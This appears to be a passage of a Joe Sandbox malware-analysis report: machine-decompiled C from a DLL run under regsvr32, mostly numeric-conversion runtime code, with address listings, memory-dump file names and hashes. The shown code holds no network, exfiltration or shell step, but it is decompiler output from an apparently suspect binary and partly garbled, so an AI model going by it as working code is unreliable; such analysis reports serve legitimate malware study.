								if(E10044D20(_t147, _t172,  &_v68, _t201, _t208, _t210, _t214, _t218) != 0) {
									r9d = 0;
									r8d = 0;
									_v88 = _t210;
									E1003C6F0(0, _t201, _t218);
								}
								if(E10044D70(_t147, _t172,  &_v72, _t201, _t208, _t210, _t214, _t218) != 0) {
									r9d = 0;
									r8d = 0;
									_v88 = _t210;
									E1003C6F0(0, _t201, _t218);
								}
								_t147 = _v72;
								_v64 = _v64 + _t147;
								if(E1003C090(_t124, _t144, _t147, _t172,  &_v56,  &_v64, _t208, _t210, _t214, _t218) != 0) {
									goto L23;
								} else {
									_t119 =  *((intOrPtr*)(_t172 + 0x20));
									if(_t119 > 0 || _t119 < 0 && _v24 > 0) {
										_t147 = _v68;
										_v64 = _v64 + _t147;
										if(E1003C090(_t124, _t144, _t147, _t172,  &_v56,  &_v64, _t208, _t210, _t214, _t218) == 0) {
											goto L27;
										}
										goto L23;
									} else {
										goto L27;
									}
								}
							}
							L11:
							if(r8d > 1) {
								_t226 = _t226 + 1;
							}
							goto L13;
						}
						_t103 = _t102 * _t224;
						_t198 = ((_t194 + _t224 >> 6) + (_t194 + _t224 >> 6 >> 0x3f)) * 0x64;
						if(_t224 != _t198) {
							goto L11;
						}
						goto L10;
					}
				}
				E1003AF40(_t146);
				r9d = 0;
				r8d = 0;
				_v88 = __rsi;
				 *_t146 = 0x16;
				_t96 = E1003C790(__rcx, __rcx, __rdx, __rdi, __rsi, __rbp, _t216);
				goto L24;
			}
































                                                                              0x1003bd80
                                                                              0x1003bd80
                                                                              0x1003bd80
                                                                              0x1003bd80
                                                                              0x1003bd80
                                                                              0x1003bd80
                                                                              0x1003bd87
                                                                              0x1003bd8b
                                                                              0x1003bd94
                                                                              0x1003bd98
                                                                              0x1003bd9b
                                                                              0x1003bd9e
                                                                              0x1003bda1
                                                                              0x1003bda3
                                                                              0x1003bdc9
                                                                              0x1003bdcd
                                                                              0x1003bdd2
                                                                              0x1003bddc
                                                                              0x1003bff4
                                                                              0x1003bff4
                                                                              0x1003bff9
                                                                              0x1003bfff
                                                                              0x1003c006
                                                                              0x1003c022
                                                                              0x1003c022
                                                                              0x1003bde2
                                                                              0x1003bde7
                                                                              0x1003be01
                                                                              0x1003be04
                                                                              0x1003be09
                                                                              0x1003be0e
                                                                              0x1003be11
                                                                              0x1003be16
                                                                              0x1003be18
                                                                              0x1003be1b
                                                                              0x1003be1f
                                                                              0x1003be22
                                                                              0x1003be22
                                                                              0x1003be27
                                                                              0x1003be31
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003be37
                                                                              0x1003be37
                                                                              0x1003be45
                                                                              0x1003be49
                                                                              0x1003be4b
                                                                              0x1003be63
                                                                              0x1003be69
                                                                              0x1003be8b
                                                                              0x1003be8b
                                                                              0x1003be95
                                                                              0x1003bea9
                                                                              0x1003beb3
                                                                              0x1003bebf
                                                                              0x1003bebf
                                                                              0x1003bec6
                                                                              0x1003beda
                                                                              0x1003bf01
                                                                              0x1003bf0f
                                                                              0x1003bf15
                                                                              0x1003bf17
                                                                              0x1003bf50
                                                                              0x1003bf55
                                                                              0x1003bf5a
                                                                              0x1003c034
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003c036
                                                                              0x1003c036
                                                                              0x1003c03d
                                                                              0x1003c042
                                                                              0x1003c048
                                                                              0x1003c04e
                                                                              0x1003c054
                                                                              0x1003c05a
                                                                              0x1003c060
                                                                              0x1003c066
                                                                              0x1003c069
                                                                              0x1003c06c
                                                                              0x00000000
                                                                              0x1003c06f
                                                                              0x1003bf60
                                                                              0x1003bf71
                                                                              0x1003bf73
                                                                              0x1003bf76
                                                                              0x1003bf7d
                                                                              0x1003bf82
                                                                              0x1003bf82
                                                                              0x1003bf93
                                                                              0x1003bf95
                                                                              0x1003bf98
                                                                              0x1003bf9f
                                                                              0x1003bfa4
                                                                              0x1003bfa4
                                                                              0x1003bfa9
                                                                              0x1003bfb8
                                                                              0x1003bfc4
                                                                              0x00000000
                                                                              0x1003bfc6
                                                                              0x1003bfc6
                                                                              0x1003bfcb
                                                                              0x1003bfd7
                                                                              0x1003bfe6
                                                                              0x1003bff2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003bfcb
                                                                              0x1003bfc4
                                                                              0x1003beb5
                                                                              0x1003beb9
                                                                              0x1003bebb
                                                                              0x1003bebb
                                                                              0x00000000
                                                                              0x1003beb9
                                                                              0x1003be6e
                                                                              0x1003be82
                                                                              0x1003be89
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003be89
                                                                              0x1003bde7
                                                                              0x1003bda5
                                                                              0x1003bdaa
                                                                              0x1003bdad
                                                                              0x1003bdb4
                                                                              0x1003bdb9
                                                                              0x1003bdbf
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6be2cdad63974a57928831116515c3e045cb7acd692dd85f59514e0b5e0cc479
                                                                              • Instruction ID: 51bad4d59a9be24fb0a356ef657b0fe940e418611207ef09fb98249c92481168
                                                                              • Opcode Fuzzy Hash: 6be2cdad63974a57928831116515c3e045cb7acd692dd85f59514e0b5e0cc479
                                                                              • Instruction Fuzzy Hash: DF8105B2B14B858BCB58CF29E49175DB3A1F784B89F519026EB4DCB758EB39D502CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004ECE8 Relevance: .2, Instructions: 186COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E1004ECE8(void* __ebx, signed int __ebp, void* __rdx, long long __r8, void* __r11, long long* __r13, signed int _a48, signed int _a52, signed int _a56, long long _a64, signed int* _a72, unsigned int _a80, signed short _a82, signed int _a84, signed int _a86, signed int _a88, signed int _a90, signed int _a96, signed int _a98, signed int _a100, signed int _a102, unsigned int _a104, signed int _a106, unsigned int _a112, signed int _a114, char _a128, signed int _a151, signed int _a160, void* _a184, void* _a192, void* _a200, void* _a208, void* _a216, void* _a224, void* _a232, void* _a240, intOrPtr _a288, intOrPtr _a296) {
				unsigned int _t143;
				signed int _t144;
				signed short _t154;
				signed short _t155;
				signed short _t159;
				signed short _t160;
				signed int _t161;
				signed int _t165;
				signed int _t167;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed char _t184;
				void* _t185;
				signed int _t186;
				signed int _t188;
				signed short _t189;
				signed short _t190;
				signed int _t192;
				signed int _t196;
				void* _t197;
				signed int _t199;
				signed short _t203;
				signed int _t204;
				signed int _t207;
				void* _t208;
				signed int _t209;
				signed int _t212;
				signed int _t213;
				void* _t222;
				signed long long _t230;
				void* _t231;
				void* _t232;
				long long _t234;
				signed int* _t235;
				void* _t237;
				intOrPtr* _t239;
				signed long long _t242;
				void* _t246;
				signed int* _t247;
				void* _t248;
				signed int _t249;
				void* _t250;
				char* _t251;
				signed short* _t252;
				long long* _t254;
				signed int* _t257;

				_t254 = __r13;
				_t250 = __r11;
				_t244 = __r8;
				_t232 = __rdx;
				_t213 = __ebp;
				_t185 = __ebx;
				if(__rdx - 0x31 > 8) {
					_t218 =  *((intOrPtr*)( *((intOrPtr*)( *_t239 + 0x128))));
					__eflags = _t197 -  *_t218;
					if(_t197 !=  *_t218) {
						__eflags = _t197 - 0x2b;
						if(_t197 == 0x2b) {
							r9d = 2;
							_a52 = 0;
							goto L1;
						}
						__eflags = _t197 - 0x2d;
						if(_t197 == 0x2d) {
							r9d = 2;
							_a52 = 0x8000;
							goto L1;
						}
						__eflags = _t197 - 0x30;
						if(_t197 != 0x30) {
							_t244 = __r8 - 1;
							_t207 = 0;
							goto L14;
						}
						r9d = 1;
						goto L1;
					}
					r9d = 5;
				} else {
					r9d = 3;
					_t244 = __r8 - 1;
					do {
						goto L1;
					} while (r9d != 0xa);
					_t207 = 0;
					__eflags = 0;
					L14:
					__eflags = _t213;
					 *_t254 = _t244;
					if(_t213 == 0) {
						r8d = _t207;
						_t199 = _t207;
						_t207 = 4;
						L108:
						_t188 = 0;
						_t143 = 0;
						__eflags = 0;
						L109:
						_t247 = _a72;
						_t144 = _t143 | _a52;
						__eflags = _t144;
						_t247[2] = _t144;
						 *_t247 = _t188;
						_t247[0] = _t199;
						_t247[1] = r8d;
						__eflags = _a160 ^ _t242;
						return E10038D20(_t188, _a160 ^ _t242);
					}
					__eflags = r10d - 0x18;
					if(r10d <= 0x18) {
						__eflags = r10d;
						if(r10d == 0) {
							r8d = _t207;
							_t199 = _t207;
							goto L108;
						}
						L21:
						_t251 = _t250 - 1;
						__eflags =  *_t251;
						if( *_t251 != 0) {
							L24:
							_t16 =  &_a96; // 0x61
							_t17 =  &_a128; // 0x81
							E10052690(r10d, _t222, _t17, _t232, _t237, _t239, _t16, _t246, _t248, _t251);
							__eflags = r14d;
							if(r14d >= 0) {
								r8d = _a48;
							} else {
								r8d = _a48;
								r8d =  ~r8d;
							}
							r8d = r8d + _t185;
							__eflags = r12d;
							if(r12d == 0) {
								r8d = r8d + _a288;
								__eflags = r8d;
							}
							__eflags = r15d;
							if(r15d == 0) {
								r8d = r8d - _a296;
								__eflags = r8d;
							}
							__eflags = r8d - 0x1450;
							if(r8d > 0x1450) {
								_t199 = _t207;
								_t143 = 0x7fff;
								r8d = 0x80000000;
								_t207 = 2;
								_t188 = 0;
								goto L109;
							} else {
								__eflags = r8d - 0xffffebb0;
								if(r8d < 0xffffebb0) {
									r8d = _t207;
									_t199 = _t207;
									_t207 = 1;
									goto L108;
								}
								_t234 = 0x10070ac0;
								__eflags = r8d;
								if(r8d == 0) {
									L103:
									_t188 = _a96 & 0x0000ffff;
									_t199 = _a98;
									r8d = _a102;
									_t143 = _a104 >> 0x10;
									goto L109;
								}
								__eflags = r8d;
								if(r8d < 0) {
									r8d =  ~r8d;
									_t234 = 0x10070c20;
									__eflags = 0x10070c80;
								}
								__eflags = _a56;
								_t150 =  ==  ? 0 : _a96 & 0x0000ffff;
								__eflags = r8d;
								_a96 =  ==  ? 0 : _a96 & 0x0000ffff;
								if(r8d == 0) {
									_t207 = 0;
									__eflags = 0;
								} else {
									r9d = 0xffff8000;
									do {
										_t234 = _t234 + 0x54;
										r8d = r8d >> 3;
										__eflags = r8d & 0x00000007;
										_a48 = r8d;
										_a64 = _t234;
										if((r8d & 0x00000007) == 0) {
											goto L100;
										}
										_t230 = _t218 + _t218 * 2;
										__eflags =  *((short*)(_t234 + _t230 * 4)) - 0x8000;
										_t257 = _t234 + _t230 * 4;
										if( *((short*)(_t234 + _t230 * 4)) >= 0x8000) {
											_t33 =  &_a112; // 0x71
											_t230 = _t33;
											 *_t230 =  *_t257;
											_t181 = _t257[2];
											_t35 =  &_a112; // 0x71
											_t257 = _t35;
											 *(_t230 + 8) = _t181;
											_t218 = _a112 >> 0x10;
											_t182 = _t181 - 1;
											__eflags = _t182;
											_a114 = _t182;
										}
										_t189 = _t257[2] & 0x0000ffff;
										_t154 = _a106 & 0x0000ffff;
										r15d = 0;
										_t190 = _t189 & 0x00007fff;
										_a80 = 0;
										_t155 = _t154 & 0x00007fff;
										_a84 = 0;
										_t203 = (_t189 & 0x0000ffff ^ _t154) & 0x00008000;
										__eflags = _t155 - 0x7fff;
										_a88 = 0;
										_a56 = _t203;
										_t208 = _t218 + _t230;
										if(_t155 >= 0x7fff) {
											L99:
											__eflags = _t203;
											_t234 = _a64;
											_t157 =  !=  ? r9d : 0x7fff8000;
											__eflags = 0x7fff8000;
											_a100 = 0;
											_a96 = 0;
											_a104 =  !=  ? r9d : 0x7fff8000;
										} else {
											__eflags = _t190 - 0x7fff;
											if(_t190 >= 0x7fff) {
												goto L99;
											}
											__eflags = _t208 - 0xbffd;
											if(_t208 > 0xbffd) {
												goto L99;
											}
											__eflags = _t208 - 0x3fbf;
											if(_t208 > 0x3fbf) {
												__eflags = _t155;
												if(_t155 != 0) {
													L51:
													__eflags = _t190;
													if(_t190 != 0) {
														L56:
														r13d = 0;
														_t235 =  &_a84;
														r12d = 5;
														do {
															__eflags = r12d;
															_t186 = r12d;
															_t231 = _t254 + _t254;
															if(r12d <= 0) {
																goto L71;
															}
															_t63 =  &(_t257[2]); // 0x9
															_t249 = _t63;
															_t65 = _t231 + 0x60; // 0x65
															_t252 = _t242 + _t65;
															_t212 = r13d & 0x00000001;
															__eflags = _t212;
															do {
																_t192 = ( *_t252 & 0x0000ffff) * ( *_t249 & 0x0000ffff);
																__eflags = _t212;
																if(_t212 == 0) {
																	r8d = 0;
																	r9d = _t218 + _t231;
																	__eflags = r9d -  *(_t235 - 4);
																	if(r9d <  *(_t235 - 4)) {
																		L66:
																		r8d = 1;
																		L67:
																		 *(_t235 - 4) = r9d;
																		goto L68;
																	}
																	__eflags = r9d - _t192;
																	if(r9d >= _t192) {
																		goto L67;
																	}
																	goto L66;
																}
																r8d = 0;
																r9d = _t218 + _t231;
																__eflags = r9d -  *(_t235 - 4);
																if(r9d <  *(_t235 - 4)) {
																	L62:
																	r8d = 1;
																	L63:
																	 *(_t235 - 4) = r9d;
																	goto L68;
																}
																__eflags = r9d - _t192;
																if(r9d >= _t192) {
																	goto L63;
																}
																goto L62;
																L68:
																__eflags = r8d;
																if(r8d != 0) {
																	 *_t235 =  *_t235 + 1;
																	__eflags =  *_t235;
																}
																_t186 = _t186 - 1;
																_t252 =  &(_t252[1]);
																_t249 = _t249 - 2;
																__eflags = _t186;
															} while (_t186 > 0);
															L71:
															r12d = r12d - 1;
															_t235 =  &(_t235[0]);
															r13d = r13d + 1;
															__eflags = r12d;
														} while (r12d > 0);
														_t209 = _t208 + 0xc002;
														__eflags = _t209;
														if(__eflags <= 0) {
															r8d = _a88;
															_t204 = _a84;
															r9d = _a80;
															L86:
															_t209 = _t209 + 0xffff;
															__eflags = _t209;
															if(_t209 >= 0) {
																L78:
																_t159 = _a80 & 0x0000ffff;
																L79:
																__eflags = _t159 - 0x8000;
																if(_t159 > 0x8000) {
																	L81:
																	_t160 = _a82;
																	__eflags = _t160 - 0xffffffff;
																	if(_t160 != 0xffffffff) {
																		_t161 = _t160 + 1;
																		__eflags = _t161;
																		_a82 = _t161;
																		_t204 = _a84;
																	} else {
																		_t165 = _a86;
																		_a82 = 0;
																		__eflags = _t165 - 0xffffffff;
																		if(_t165 != 0xffffffff) {
																			_a86 = _t165 + 1;
																			r8d = _a88;
																			_t204 = _a84;
																		} else {
																			_t167 = _a90 & 0x0000ffff;
																			_a86 = 0;
																			__eflags = _t167 - 0xffff;
																			if(_t167 != 0xffff) {
																				_t204 = _a84;
																				_a90 = _t167 + 1;
																				r8d = _a88;
																			} else {
																				_t204 = _a84;
																				_a90 = 0x8000;
																				r8d = _a88;
																				_t209 = _t209 + 1;
																			}
																		}
																	}
																	L96:
																	__eflags = _t209 - 0x7fff;
																	if(_t209 < 0x7fff) {
																		_a98 = _t204;
																		_t234 = _a64;
																		_a102 = r8d;
																		r8d = _a48;
																		_a96 = _a82 & 0x0000ffff;
																		_a106 = _t209 | _a56;
																		r9d = 0xffff8000;
																	} else {
																		__eflags = _a56;
																		_t234 = _a64;
																		r8d = _a48;
																		r9d = 0xffff8000;
																		_a100 = 0;
																		_t164 =  !=  ? r9d : 0x7fff8000;
																		_a96 = 0;
																		_a104 =  !=  ? r9d : 0x7fff8000;
																	}
																	goto L100;
																}
																r9d = r9d & 0x0001ffff;
																__eflags = r9d - 0x18000;
																if(r9d != 0x18000) {
																	goto L96;
																}
																goto L81;
															}
															r10d =  ~(_t209 & 0x0000ffff) & 0x0000ffff;
															_t209 = _t209 + r10w;
															__eflags = _t209;
															do {
																__eflags = _a80 & 0x00000001;
																if((_a80 & 0x00000001) != 0) {
																	r15d = r15d + 1;
																	__eflags = r15d;
																}
																r9d = r9d >> 1;
																r9d = r9d | _t204 << 0x0000001f;
																r8d = r8d >> 1;
																_t204 = _t204 >> 0x00000001 | r8d << 0x0000001f;
																_t249 = _t249 - 1;
																__eflags = _t249;
																_a80 = r9d;
															} while (_t249 != 0);
															__eflags = r15d;
															_a84 = _t204;
															_a88 = r8d;
															if(r15d == 0) {
																goto L78;
															}
															_t159 = r9w | 0x00000001;
															_a80 = _t159;
															r9d = _a80;
															goto L79;
														}
														r8d = _a88;
														_t204 = _a84;
														r9d = _a80;
														while(1) {
															asm("inc ecx");
															if(__eflags < 0) {
																break;
															}
															r8d = r8d + r8d;
															_t196 = _t204 >> 0x1f;
															r9d = r9d + r9d;
															_t204 = _t204 + _t204 | r9d >> 0x0000001f;
															r8d = r8d | _t196;
															_t209 = _t209 + 0xffff;
															_a84 = _t204;
															_a88 = r8d;
															__eflags = _t209;
															_a80 = r9d;
															if(__eflags > 0) {
																continue;
															}
															goto L86;
														}
														__eflags = _t209;
														if(_t209 <= 0) {
															goto L86;
														}
														goto L78;
													}
													_t208 = _t208 + 1;
													asm("btr eax, 0x1f");
													__eflags = _t257[2];
													if(_t257[2] != 0) {
														goto L56;
													}
													__eflags = _t257[1];
													if(_t257[1] != 0) {
														goto L56;
													}
													__eflags =  *_t257;
													if( *_t257 != 0) {
														goto L56;
													}
													_t234 = _a64;
													_a104 = 0;
													_a100 = 0;
													_a96 = 0;
													goto L100;
												}
												_t208 = _t208 + 1;
												asm("btr eax, 0x1f");
												__eflags = _a104;
												if(_a104 != 0) {
													goto L51;
												}
												__eflags = _a100;
												if(_a100 != 0) {
													goto L51;
												}
												__eflags = _a96;
												if(_a96 != 0) {
													goto L51;
												}
												_t234 = _a64;
												_a106 = 0;
												goto L100;
											}
											_t234 = _a64;
											_a104 = 0;
											_a100 = 0;
											_a96 = 0;
										}
										L100:
										__eflags = r8d;
									} while (r8d != 0);
									_t207 = 0;
								}
								goto L103;
							}
						}
						do {
							_t251 = _t251 - 1;
							r10d = r10d + 0xffffffff;
							_t185 = _t185 + 1;
							__eflags =  *_t251;
						} while ( *_t251 == 0);
						goto L24;
					}
					_t183 = _a151 & 0x000000ff;
					__eflags = _t183 - 5;
					if(_t183 >= 5) {
						_t184 = _t183 + 1;
						__eflags = _t184;
						_a151 = _t184;
					}
					_t250 = _t250 - 1;
					r10d = 0x18;
					_t185 = _t185 + 1;
					goto L21;
				}
				L1:
				_t244 = _t244 + 1;
				if(r9d <= 0xb) {
					_t218 = 0x10000000;
					goto __rcx;
				}
				__eflags = r9d - 0xa;
			}


















































                                                                              0x1004ece8
                                                                              0x1004ece8
                                                                              0x1004ece8
                                                                              0x1004ece8
                                                                              0x1004ece8
                                                                              0x1004ece8
                                                                              0x1004eced
                                                                              0x1004ed0c
                                                                              0x1004ed0f
                                                                              0x1004ed11
                                                                              0x1004ed22
                                                                              0x1004ed25
                                                                              0x1004ed60
                                                                              0x1004ed66
                                                                              0x00000000
                                                                              0x1004ed6d
                                                                              0x1004ed27
                                                                              0x1004ed2a
                                                                              0x1004ed47
                                                                              0x1004ed4d
                                                                              0x00000000
                                                                              0x1004ed54
                                                                              0x1004ed2c
                                                                              0x1004ed2f
                                                                              0x1004f15c
                                                                              0x1004f160
                                                                              0x00000000
                                                                              0x1004f160
                                                                              0x1004ed35
                                                                              0x00000000
                                                                              0x1004ed3b
                                                                              0x1004ed13
                                                                              0x1004ecef
                                                                              0x1004ecef
                                                                              0x1004ecf5
                                                                              0x1004ecc0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f11d
                                                                              0x1004f11d
                                                                              0x1004f11f
                                                                              0x1004f11f
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f71b
                                                                              0x1004f71b
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f77b
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f702
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f21c
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f256
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f26d
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27a
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f287
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x00000000
                                                                              0x1004f6e2
                                                                              0x1004f2a8
                                                                              0x1004f2ac
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b5
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2cd
                                                                              0x1004f2d7
                                                                              0x1004f2db
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fb
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f314
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f340
                                                                              0x1004f340
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f370
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f386
                                                                              0x1004f386
                                                                              0x1004f38b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f391
                                                                              0x1004f396
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
